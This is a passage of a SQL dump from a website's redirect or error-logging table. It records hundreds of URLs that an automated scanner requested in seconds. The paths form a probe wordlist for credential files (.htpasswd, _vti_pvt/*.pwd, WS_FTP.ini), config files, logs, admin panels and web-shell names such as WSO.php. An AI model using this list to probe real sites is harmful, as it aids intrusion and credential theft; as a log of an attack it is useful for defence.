00:00:00',301),(4584,'http://ekvatorprint.com.ua/TechnologySamples/Subscriptionservlet',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4585,'http://ekvatorprint.com.ua/TechnologySamples/Subscription',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4586,'http://ekvatorprint.com.ua/ThankYou.',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4587,'http://ekvatorprint.com.ua/Thumbs.db',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4588,'http://ekvatorprint.com.ua/Trace.axd',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4589,'http://ekvatorprint.com.ua/Trace.axd::$DATA',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4590,'http://ekvatorprint.com.ua/UPGRADE',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4591,'http://ekvatorprint.com.ua/UPDATE.txt',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4592,'http://ekvatorprint.com.ua/UPGRADE_README.txt',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4593,'http://ekvatorprint.com.ua/UPGRADE.txt',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4594,'http://ekvatorprint.com.ua/UniversityServlet',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4595,'http://ekvatorprint.com.ua/Updates.txt',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4596,'http://ekvatorprint.com.ua/Upload',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4597,'http://ekvatorprint.com.ua/UserFiles',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4598,'http://ekvatorprint.com.ua/VERSION.md',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4599,'http://ekvatorprint.com.ua/UserFile',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4600,'http://ekvatorprint.com.ua/VERSION.txt',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4601,'http://ekvatorprint.com.ua/VERSIONS.html',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4602,'http://ekvatorprint.com.ua/VERSIONS.md',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4603,'http://ekvatorprint.com.ua/Version.',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4604,'http://ekvatorprint.com.ua/Version.php',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4605,'http://ekvatorprint.com.ua/VERSIONS.txt',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4606,'http://ekvatorprint.com.ua/WEB-INF/web.xml',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4607,'http://ekvatorprint.com.ua/WEB-INF',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4608,'http://ekvatorprint.com.ua/WEB-INF/config.xml',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4609,'http://ekvatorprint.com.ua/WEB-INF./web.xml',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4610,'http://ekvatorprint.com.ua/WS_FTP',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4611,'http://ekvatorprint.com.ua/WLDummyInitJVMIDs',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4612,'http://ekvatorprint.com.ua/WP',NULL,'','',1,0,'2017-01-20 13:26:58','0000-00-00 00:00:00',301),(4613,'http://ekvatorprint.com.ua/WSO.php',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4614,'http://ekvatorprint.com.ua/WSsamples',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4615,'http://ekvatorprint.com.ua/WS_FTP.LOG',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4616,'http://ekvatorprint.com.ua/TechnologySamples/docs',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4617,'http://ekvatorprint.com.ua/WS_FTP.ini',NULL,'','',4,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4618,'http://ekvatorprint.com.ua/WS_FTP.log',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4619,'http://ekvatorprint.com.ua/WarehouseWeb',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4620,'http://ekvatorprint.com.ua/WS_FTP/',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4621,'http://ekvatorprint.com.ua/WarehouseEJB/services/WarehouseFront',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4622,'http://ekvatorprint.com.ua/WarehouseEJB/',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4623,'http://ekvatorprint.com.ua/WarehouseEJB/services/WarehouseFront/wsdl/',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4624,'http://ekvatorprint.com.ua/WarehouseWebservlet/',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4625,'http://ekvatorprint.com.ua/WarehouseWeb/',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4626,'http://ekvatorprint.com.ua/WarehouseWebservlet',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4627,'http://ekvatorprint.com.ua/WebService',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4628,'http://ekvatorprint.com.ua/WebAdmin/',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4629,'http://ekvatorprint.com.ua/Web.config',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4630,'http://ekvatorprint.com.ua/WebResource.axd?d=LER8t9aS',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4631,'http://ekvatorprint.com.ua/WebServicesSamples/docs/',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4632,'http://ekvatorprint.com.ua/WebAdmin',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4633,'http://ekvatorprint.com.ua/WebServiceServlet',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4634,'http://ekvatorprint.com.ua/WebSer~1',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4635,'http://ekvatorprint.com.ua/WebSphereBank',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4636,'http://ekvatorprint.com.ua/WebSphere',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4637,'http://ekvatorprint.com.ua/WebShell.cgi',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4638,'http://ekvatorprint.com.ua/WebSphereBank/',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4639,'http://ekvatorprint.com.ua/WebSphereBankDeposit/',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4640,'http://ekvatorprint.com.ua/WebSphereBankDepositservlet',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4641,'http://ekvatorprint.com.ua/WebSphereBankDeposit',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4642,'http://ekvatorprint.com.ua/WebSphereBank/docs/',NULL,'','',1,0,'2017-01-20 13:26:59','0000-00-00 00:00:00',301),(4643,'http://ekvatorprint.com.ua/WebSphereSamples.Configuration.config',NULL,'','',2,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4644,'http://ekvatorprint.com.ua/WebSphereSamples/SingleSamples/AccountAndTransfer/create.html',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4645,'http://ekvatorprint.com.ua/WebSphereBankservlet/',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4646,'http://ekvatorprint.com.ua/WebSphereBankDepositservlet/',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4647,'http://ekvatorprint.com.ua/WebSphereSamples',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4648,'http://ekvatorprint.com.ua/WebSphereBankservlet',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4649,'http://ekvatorprint.com.ua/WebSphereSamples/',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4650,'http://ekvatorprint.com.ua/Webadmin',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4651,'http://ekvatorprint.com.ua/Webalizer/',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4652,'http://ekvatorprint.com.ua/WebSphereSamples/YourCo/main.html',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4653,'http://ekvatorprint.com.ua/WebSphereSamples/SingleSamples/Increment/increment.html',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4654,'http://ekvatorprint.com.ua/Wishlist.php',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4655,'http://ekvatorprint.com.ua/_',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4656,'http://ekvatorprint.com.ua/Wordpress/',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4657,'http://ekvatorprint.com.ua/WordPress/',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4658,'http://ekvatorprint.com.ua/XSQLConfig.xml',NULL,'','',2,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4659,'http://ekvatorprint.com.ua/Wishlist.',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4660,'http://ekvatorprint.com.ua/_AuthChangeUrl',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4661,'http://ekvatorprint.com.ua/_DynaCacheEsi/',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4662,'http://ekvatorprint.com.ua/_DynaCacheEsi',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4663,'http://ekvatorprint.com.ua/_.htpasswd',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4664,'http://ekvatorprint.com.ua/_Admin/',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4665,'http://ekvatorprint.com.ua/_DynaCacheEsi/esiInvalidator',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4666,'http://ekvatorprint.com.ua/_h5ai/',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4667,'http://ekvatorprint.com.ua/_SQL',NULL,'','',1,0,'2017-01-20 13:27:00','0000-00-00 00:00:00',301),(4668,'http://ekvatorprint.com.ua/__MACOSX',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4669,'http://ekvatorprint.com.ua/__SQL',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4670,'http://ekvatorprint.com.ua/_WEB_INF/',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4671,'http://ekvatorprint.com.ua/__test.php',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4672,'http://ekvatorprint.com.ua/__index.php',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4673,'http://ekvatorprint.com.ua/__cache/',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4674,'http://ekvatorprint.com.ua/__pma___',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4675,'http://ekvatorprint.com.ua/_adm',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4676,'http://ekvatorprint.com.ua/__admin',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4677,'http://ekvatorprint.com.ua/_admin/',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4678,'http://ekvatorprint.com.ua/_admin',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4679,'http://ekvatorprint.com.ua/_admin.html',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4680,'http://ekvatorprint.com.ua/_cm_admin',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4681,'http://ekvatorprint.com.ua/_admin_',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4682,'http://ekvatorprint.com.ua/_common.xsl',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4683,'http://ekvatorprint.com.ua/_awstats/',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4684,'http://ekvatorprint.com.ua/_admincp',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4685,'http://ekvatorprint.com.ua/_data/',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4686,'http://ekvatorprint.com.ua/_baks',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4687,'http://ekvatorprint.com.ua/_config.inc',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4688,'http://ekvatorprint.com.ua/_administration',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4689,'http://ekvatorprint.com.ua/_administracion',NULL,'','',1,0,'2017-01-20 13:27:01','0000-00-00 00:00:00',301),(4690,'http://ekvatorprint.com.ua/_data/error_log',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4691,'http://ekvatorprint.com.ua/_dbadmin',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4692,'http://ekvatorprint.com.ua/_funcion/',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4693,'http://ekvatorprint.com.ua/_errors',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4694,'http://ekvatorprint.com.ua/_docs.en/readme.txt',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4695,'http://ekvatorprint.com.ua/_funciones/',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4696,'http://ekvatorprint.com.ua/_include',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4697,'http://ekvatorprint.com.ua/_inc/',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4698,'http://ekvatorprint.com.ua/_fpclass/',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4699,'http://ekvatorprint.com.ua/_function/',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4700,'http://ekvatorprint.com.ua/_functions/',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4701,'http://ekvatorprint.com.ua/_files',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4702,'http://ekvatorprint.com.ua/_index',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4703,'http://ekvatorprint.com.ua/_include/',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4704,'http://ekvatorprint.com.ua/_install',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4705,'http://ekvatorprint.com.ua/_layouts',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4706,'http://ekvatorprint.com.ua/_index.php',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4707,'http://ekvatorprint.com.ua/_includes/',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4708,'http://ekvatorprint.com.ua/_layouts/alllibs.htm',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4709,'http://ekvatorprint.com.ua/_layouts/settings.htm',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4710,'http://ekvatorprint.com.ua/_layouts/userinfo.htm',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4711,'http://ekvatorprint.com.ua/_log/',NULL,'','',1,0,'2017-01-20 13:27:02','0000-00-00 00:00:00',301),(4712,'http://ekvatorprint.com.ua/_log/error_log',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4713,'http://ekvatorprint.com.ua/_log/error.log',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4714,'http://ekvatorprint.com.ua/_logs/access-log',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4715,'http://ekvatorprint.com.ua/_log/error-log',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4716,'http://ekvatorprint.com.ua/_log/access.log',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4717,'http://ekvatorprint.com.ua/_log/access_log',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4718,'http://ekvatorprint.com.ua/_logs/',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4719,'http://ekvatorprint.com.ua/_logs',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4720,'http://ekvatorprint.com.ua/_logs/access.log',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4721,'http://ekvatorprint.com.ua/_logs/access_log',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4722,'http://ekvatorprint.com.ua/_logs/error.log',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4723,'http://ekvatorprint.com.ua/_mem_bin/autoconfig.php',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4724,'http://ekvatorprint.com.ua/_logs/error-log',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4725,'http://ekvatorprint.com.ua/_logs/error_log',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4726,'http://ekvatorprint.com.ua/_mem_bin/',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4727,'http://ekvatorprint.com.ua/_mem_bin/autoconfig.',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4728,'http://ekvatorprint.com.ua/_mem_bin/formslogin.php',NULL,'','',1,0,'2017-01-20 13:27:03','0000-00-00 00:00:00',301),(4729,'http://ekvatorprint.com.ua/_mem_bin/formslogin.',NULL,'','',1,0,'2017-01-20 13:27:04','0000-00-00 00:00:00',301),(4730,'http://ekvatorprint.com.ua/_log/access-log',NULL,'','',1,0,'2017-01-20 13:27:04','0000-00-00 00:00:00',301),(4731,'http://ekvatorprint.com.ua/_mm',NULL,'','',1,0,'2017-01-20 13:27:04','0000-00-00 00:00:00',301),(4732,'http://ekvatorprint.com.ua/_mmServerScripts/MMHTTPDB.php',NULL,'','',1,0,'2017-01-20 13:27:04','0000-00-00 00:00:00',301),(4733,'http://ekvatorprint.com.ua/_myadmin.php',NULL,'','',1,0,'2017-01-20 13:27:04','0000-00-00 00:00:00',301),(4734,'http://ekvatorprint.com.ua/_myadmin',NULL,'','',1,0,'2017-01-20 13:27:04','0000-00-00 00:00:00',301),(4735,'http://ekvatorprint.com.ua/_news_admin_',NULL,'','',1,0,'2017-01-20 13:27:04','0000-00-00 00:00:00',301),(4736,'http://ekvatorprint.com.ua/_myadmin.',NULL,'','',1,0,'2017-01-20 13:27:04','0000-00-00 00:00:00',301),(4737,'http://ekvatorprint.com.ua/_mmServerScripts/MMHTTPDB.asp',NULL,'','',1,0,'2017-01-20 13:27:04','0000-00-00 00:00:00',301),(4738,'http://ekvatorprint.com.ua/_notes/dwsync.xml',NULL,'','',1,0,'2017-01-20 13:27:04','0000-00-00 00:00:00',301),(4739,'http://ekvatorprint.com.ua/_novo/composer.lock',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4740,'http://ekvatorprint.com.ua/_notes',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4741,'http://ekvatorprint.com.ua/_old',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4742,'http://ekvatorprint.com.ua/_phpmyadmin',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4743,'http://ekvatorprint.com.ua/_ppadmin',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4744,'http://ekvatorprint.com.ua/_privado/',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4745,'http://ekvatorprint.com.ua/_priv8/',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4746,'http://ekvatorprint.com.ua/_pages',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4747,'http://ekvatorprint.com.ua/_privados/',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4748,'http://ekvatorprint.com.ua/_phpmyadmin/',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4749,'http://ekvatorprint.com.ua/_private',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4750,'http://ekvatorprint.com.ua/_private/',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4751,'http://ekvatorprint.com.ua/_source',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4752,'http://ekvatorprint.com.ua/_superadmin',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4753,'http://ekvatorprint.com.ua/_sqladm',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4754,'http://ekvatorprint.com.ua/_src',NULL,'','',1,0,'2017-01-20 13:27:06','0000-00-00 00:00:00',301),(4755,'http://ekvatorprint.com.ua/_temp/',NULL,'','',1,0,'2017-01-20 13:27:06','0000-00-00 00:00:00',301),(4756,'http://ekvatorprint.com.ua/_siteadmin',NULL,'','',1,0,'2017-01-20 13:27:05','0000-00-00 00:00:00',301),(4757,'http://ekvatorprint.com.ua/_test',NULL,'','',1,0,'2017-01-20 13:27:06','0000-00-00 00:00:00',301),(4758,'http://ekvatorprint.com.ua/_tests',NULL,'','',1,0,'2017-01-20 13:27:06','0000-00-00 00:00:00',301),(4759,'http://ekvatorprint.com.ua/_tmp_war_DefaultWebApp',NULL,'','',1,0,'2017-01-20 13:27:06','0000-00-00 00:00:00',301),(4760,'http://ekvatorprint.com.ua/_tmp_war',NULL,'','',1,0,'2017-01-20 13:27:06','0000-00-00 00:00:00',301),(4761,'http://ekvatorprint.com.ua/_vti_adm',NULL,'','',1,0,'2017-01-20 13:27:06','0000-00-00 00:00:00',301),(4762,'http://ekvatorprint.com.ua/_vti_aut',NULL,'','',1,0,'2017-01-20 13:27:06','0000-00-00 00:00:00',301),(4763,'http://ekvatorprint.com.ua/_vti_bin',NULL,'','',1,0,'2017-01-20 13:27:06','0000-00-00 00:00:00',301),(4764,'http://ekvatorprint.com.ua/_vti_adm/',NULL,'','',1,0,'2017-01-20 13:27:06','0000-00-00 00:00:00',301),(4765,'http://ekvatorprint.com.ua/_vti_admin',NULL,'','',1,0,'2017-01-20 13:27:07','0000-00-00 00:00:00',301),(4766,'http://ekvatorprint.com.ua/_vti_bin/',NULL,'','',1,0,'2017-01-20 13:27:07','0000-00-00 00:00:00',301),(4767,'http://ekvatorprint.com.ua/_vti_bin/_vti_aut/dvwssr.dll',NULL,'','',2,0,'2017-01-20 13:27:07','0000-00-00 00:00:00',301),(4768,'http://ekvatorprint.com.ua/_vti_bin/_vti_aut/author.dll',NULL,'','',2,0,'2017-01-20 13:27:07','0000-00-00 00:00:00',301),(4769,'http://ekvatorprint.com.ua/_vti_bin/shtml.dll/asdfghjkl',NULL,'','',1,0,'2017-01-20 13:27:07','0000-00-00 00:00:00',301),(4770,'http://ekvatorprint.com.ua/_vti_bin/_vti_aut/fp30reg.dll',NULL,'','',4,0,'2017-01-20 13:27:07','0000-00-00 00:00:00',301),(4771,'http://ekvatorprint.com.ua/_vti_bin/shtml.dll',NULL,'','',1,0,'2017-01-20 13:27:07','0000-00-00 00:00:00',301),(4772,'http://ekvatorprint.com.ua/_vti_cnf',NULL,'','',1,0,'2017-01-20 13:27:07','0000-00-00 00:00:00',301),(4773,'http://ekvatorprint.com.ua/_vti_bin/shtml.exe?_vti_rpc',NULL,'','',1,0,'2017-01-20 13:27:07','0000-00-00 00:00:00',301),(4774,'http://ekvatorprint.com.ua/_vti_aut/',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4775,'http://ekvatorprint.com.ua/_vti_cnf/',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4776,'http://ekvatorprint.com.ua/_vti_bin/shtml.exe/qwertyuiop',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4777,'http://ekvatorprint.com.ua/_vti_info.html',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4778,'http://ekvatorprint.com.ua/_vti_inf.html',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4779,'http://ekvatorprint.com.ua/_vti_log',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4780,'http://ekvatorprint.com.ua/_vti_log/',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4781,'http://ekvatorprint.com.ua/_vti_pvt',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4782,'http://ekvatorprint.com.ua/_vti_pvt/',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4783,'http://ekvatorprint.com.ua/_vti_pvt/authors.pwd',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4784,'http://ekvatorprint.com.ua/_vti_pvt/administrators.pwd',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4785,'http://ekvatorprint.com.ua/_vti_pvt/administrator.pwd',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4786,'http://ekvatorprint.com.ua/_vti_pvt/service.pwd',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4787,'http://ekvatorprint.com.ua/_vti_pvt/shtml.exe',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4788,'http://ekvatorprint.com.ua/_vti_script',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4789,'http://ekvatorprint.com.ua/_vti_pvt/users.pwd',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4790,'http://ekvatorprint.com.ua/_vti_txt',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4791,'http://ekvatorprint.com.ua/_webalizer/',NULL,'','',1,0,'2017-01-20 13:27:08','0000-00-00 00:00:00',301),(4792,'http://ekvatorprint.com.ua/a\\.php',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4793,'http://ekvatorprint.com.ua/_www',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4794,'http://ekvatorprint.com.ua/_vti_txt/',NULL,'','',2,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4795,'http://ekvatorprint.com.ua/a\\.',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4796,'http://ekvatorprint.com.ua/a\\.aspx',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4797,'http://ekvatorprint.com.ua/a2e2gp2r2/x.jsp',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4798,'http://ekvatorprint.com.ua/about',NULL,'','',3,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4799,'http://ekvatorprint.com.ua/aadmin',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4800,'http://ekvatorprint.com.ua/about_us',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4801,'http://ekvatorprint.com.ua/ab/',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 